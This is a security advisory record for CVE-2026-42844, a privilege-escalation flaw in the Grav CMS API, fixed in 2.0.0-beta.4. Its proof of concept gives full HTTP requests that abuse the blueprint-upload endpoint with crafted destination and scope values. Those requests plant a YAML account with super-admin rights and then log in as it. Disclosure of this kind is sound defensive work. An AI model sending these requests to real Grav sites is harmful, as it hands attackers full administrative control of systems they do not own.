GHSA-6xx2-m8wv-756h
Suggest an improvement- Source
- https://github.com/advisories/GHSA-6xx2-m8wv-756h
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-6xx2-m8wv-756h/GHSA-6xx2-m8wv-756h.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-6xx2-m8wv-756h
- Aliases
-
- CVE-2026-42844
- Published
- 2026-05-06T21:19:21Z
- Modified
- 2026-05-06T21:39:13.853013Z
- Severity
-
- 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- Low-privileged Grav API users can create super-admin accounts via blueprint-upload
- Details
-
Summary
In Grav
2.0.0-beta.2, a low-privileged authenticated API user withapi.media.writecan abuse/api/v1/blueprint-uploadto write an arbitrary YAML file intouser/accounts/, then log in as the newly created account withapi.superprivileges.This results in full administrative compromise of the Grav API.
Details
The vulnerability is located in the API plugin's blueprint upload flow:
user/plugins/api/classes/Api/ApiRouter.php:261user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417user/plugins/api/classes/Api/Controllers/AuthController.php:41-55
The issue exists because
/api/v1/blueprint-uploadaccepts caller-controlleddestinationandscopevalues and uses them to resolve the final filesystem write target.When the request uses:
destination=self@:scope=users/anything
The server resolves the write target to the shared account directory:
user/accounts/The upload handler then writes the supplied file directly into that directory and does not block YAML account files. Because Grav accepts account YAML files and supports a plaintext
password:field on first login, an attacker can create a fully functional administrator account withapi.super.The required attacker privilege is low:
access: api: access: true media: write: truePoC
Step 1: Authenticate as the low-privileged API user
POST /api/v1/auth/token HTTP/1.1 Host: 127.0.0.1:8123 Content-Type: application/json Connection: close {"username":"uploader","password":"Upload123A"}Extract:
UPLOADER_TOKEN = <access_token from response>Attachment:
<img width="1480" height="825" alt="login-uploader" src="https://github.com/user-attachments/assets/5aeda840-4a37-4365-8e46-caec88066541" />
Step 2: Upload a malicious account YAML file
POST /api/v1/blueprint-upload HTTP/1.1 Host: 127.0.0.1:8123 X-API-Token: <UPLOADER_TOKEN> Content-Type: multipart/form-data; boundary=----CodexBoundaryF01 Connection: close ------CodexBoundaryF01 Content-Disposition: form-data; name="destination" self@: ------CodexBoundaryF01 Content-Disposition: form-data; name="scope" users/anything ------CodexBoundaryF01 Content-Disposition: form-data; name="file"; filename="pwned.yaml" Content-Type: text/yaml email: attacker@example.com fullname: attacker title: Site Administrator state: enabled password: Passw0rd!123 access: site: login: true api: super: true ------CodexBoundaryF01--Expected result:
{ "data": [ { "name": "pwned.yaml", "path": "user/accounts/pwned.yaml" } ] }Attachment:
<img width="1484" height="797" alt="upload" src="https://github.com/user-attachments/assets/0b24c03f-cac5-4b4d-840c-52ac0840969f" />
Step 3: Log in as the newly created account
POST /api/v1/auth/token HTTP/1.1 Host: 127.0.0.1:8123 Content-Type: application/json Connection: close {"username":"pwned","password":"Passw0rd!123"}Expected result:
{ "data": { "user": { "username": "pwned", "super_admin": true } } }Attachment:
<img width="1494" height="830" alt="pwned-login" src="https://github.com/user-attachments/assets/7a1ab7fc-d3fb-4077-9b61-09cd947241fe" />
Step 4: Verify privileged API access
GET /api/v1/system/info HTTP/1.1 Host: 127.0.0.1:8123 X-API-Token: <PWNED_TOKEN> Connection: closeExpected result:
The request succeeds and returns system-level information.
Attachment:
<img width="1480" height="831" alt="system-info" src="https://github.com/user-attachments/assets/31677d61-3dbd-4ea6-9fbe-80799a628cc2" />
Impact
This is an authenticated vertical privilege-escalation vulnerability.
Any API user with basic media upload capability can escalate directly to a full API super administrator by planting a new account YAML file. Once
api.superaccess is obtained, the attacker gains full control over the CMS management API and can:- modify content
- alter configuration
- manage users
- install or update plugins/themes
- access system-level administration features
In a real deployment, this level of control is sufficient for complete CMS compromise and may be chained into server-side code execution depending on enabled plugins, writable template paths, or package-management workflow.
This issue was reproduced locally:
- the upload response returned
user/accounts/pwned.yaml - logging in as
pwnedsucceeded - the new account had
super_admin = true - privileged endpoints such as
/api/v1/system/infowere accessible
- Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-05-06T21:19:21Z", "cwe_ids": [ "CWE-269", "CWE-434" ], "severity": "HIGH", "nvd_published_at": null }- References
Affected packages
Packagist / getgrav/grav
Package
- Name
- getgrav/grav
- Purl
- pkg:composer/getgrav/grav
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed2.0.0-beta.4